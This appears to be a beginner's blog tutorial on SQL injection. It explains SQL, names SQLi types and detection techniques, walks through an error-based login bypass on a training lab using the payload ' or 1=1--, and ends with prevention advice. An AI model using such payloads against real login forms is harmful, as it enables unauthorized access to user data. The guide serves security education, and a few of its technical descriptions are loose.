FORnSEC Solutions

Beginner’s Guide To SQL Injection

sql injection

If you are starting your journey with Web Application Penetration Testing and Android Penetration Testing the SQL Injection performs a good role in penetration testing. The SQL Injection comes under the OWASP TOP 10 Vulnerabilities. For a better understanding of SQL injection. Firstly, we know about SQL.

Let us begin!

What is SQL?

SQL stands for Structured Query Language. SQL is a kind of programming language that’s designed to facilitate retrieving specific information from databases. It is used to storing, manipulating, and retrieving data stored in a relational database.

When we used to fill some form on the Web the form contains the users’ details. And it will store the user details in a background database that is configured by the developers. They use Query Language to manage the database for CREATE, ALTER, DELETE  and UPDATE the databases.

What is SQL Injection?

Moreover, an SQL injection attack is a process of inserting or injecting SQL queries through input fields to an application. Shortly, to make the application give the attacker the data he wants.

Certainly, it allows the attacker to view the data that they are not normally able to retrieve in many cases the attacker can alter or delete the data it causes to change the database.

But, in some cases SQL Injection can even be used to execute commands on the operating system, potentially allowing an attacker to escalate to damaging more attacks that are behind the network.

Types of SQL Injection :

  • In Band 
  • Out of Band
  • Blind SQLi

SQL Injection Exploitation Technique :

  • Error Based SQLi

Add the single quote character ‘ in the parameter and look for errors or other anomalies.

  • Union Based SQLi

Add some SQL-specific syntax on parameters that evaluates the base value of the entry point, and a different value, and look for systematic differences in the resulting application responses.

  • Time Based SQLi

Add payloads designed to trigger time delays when executed within an SQL query and look for differences in response time.

  • Out of Band SQLi

Add OAST payloads designed to trigger an out-of-band network interaction. When executed within an SQL query and monitor any resulting interactions.

Try to identify the Parameter in the application that interacts with the Database :

  • Authentication Page
  • Search Field
  • Post Field
  • Get Field
  • HTTP Header
  • Cookie

Example Error based SQLi:-

Firstly, go to this lab site:- https://www.hacksplaining.com/exercises/sql-injection#/start

The vulnerable bank application page will be open 

Enter the username and password and check any errors are find the log file or not

Username = user@email.com

Password = password 

Then check the log it shows user “user@email.com” is available in the database but the password is invalid.

Then try to use SQLi on the password parameter like password’

Add the inverted comma it shows the error in the log

An error occurred: PG::SyntaxError: ERROR: unterminated quoted string at or near “‘password” limit 1″ LINE 1: …ers where email = ‘user@email.com’ and password = ‘password’… ^ : select * from users where email = ‘user@email.com’ and password = ‘password” limit 1.

Unable to log in to this user due to an unexpected error.

Meanwhile, The error will show the application is vulnerable to SQL injection.

Then try to fire the SQLi query ‘ or 1=1–

So usually the SQL query will check the database for the data where the username and password match with the one stored in the database. But, since we forcefully made the website to check whether the universally true statement. i.e., 1=1 passes the check. It will return the details from the User table. And the “–“ will comment on the other code in my SQL query.

SELECT * FROM User WHERE email = ‘user@email.com’ AND password =” OR 1=1

That is to say, This query will execute in the database the user will successfully log in.

Basic SQL function:- 

  • SELECT :-  Read the data from the database based on search criteria.
  • INSERT :-   Insert new data in the database.
  • UPDATE:-   Update existing data based on given criteria.
  • DELETE:-   Delete existing data based on given criteria.
  • Order By:-  Use or sort the result-set in ascending or descending order.
  • Limit BY :-  The statement is used to retrieve records from one or more tables.

How to Prevent SQL Injection:-

  • Validate user Input :- 

The first step to preventing SQL injection attacks is validating user inputs. Firstly, identify the essential SQL statements and establish a whitelist for all valid SQL statements. Meanwhile, leaving unvalidated statements out of the query. This process is known as input validation.

  • Sanitize the data by Limiting special Character :-

Meanwhile, SQLi attackers can use unique character sequences to take advantage of a database, sanitizing data not to allow string concatenation is critical. 

  • Actively Manage Patches and Update :-

However, vulnerabilities in applications and databases that are exploitable using SQL injection are regularly discovered and publicly identified. Further, keeping all web application software components. Including database server software, frameworks, libraries, plug-ins, and web server software, up to date.

  • Use Virtual or Physical Firewall :-

Above all, we strongly recommend using a software or appliance-based web application firewall (WAF) to help filter out malicious data.  

  • Apply Encryption :-

Certainly, it’s assumed internet-connected applications are not secure. Therefore encryption and hashing passwords, confidential data, and connection strings are of the utmost importance.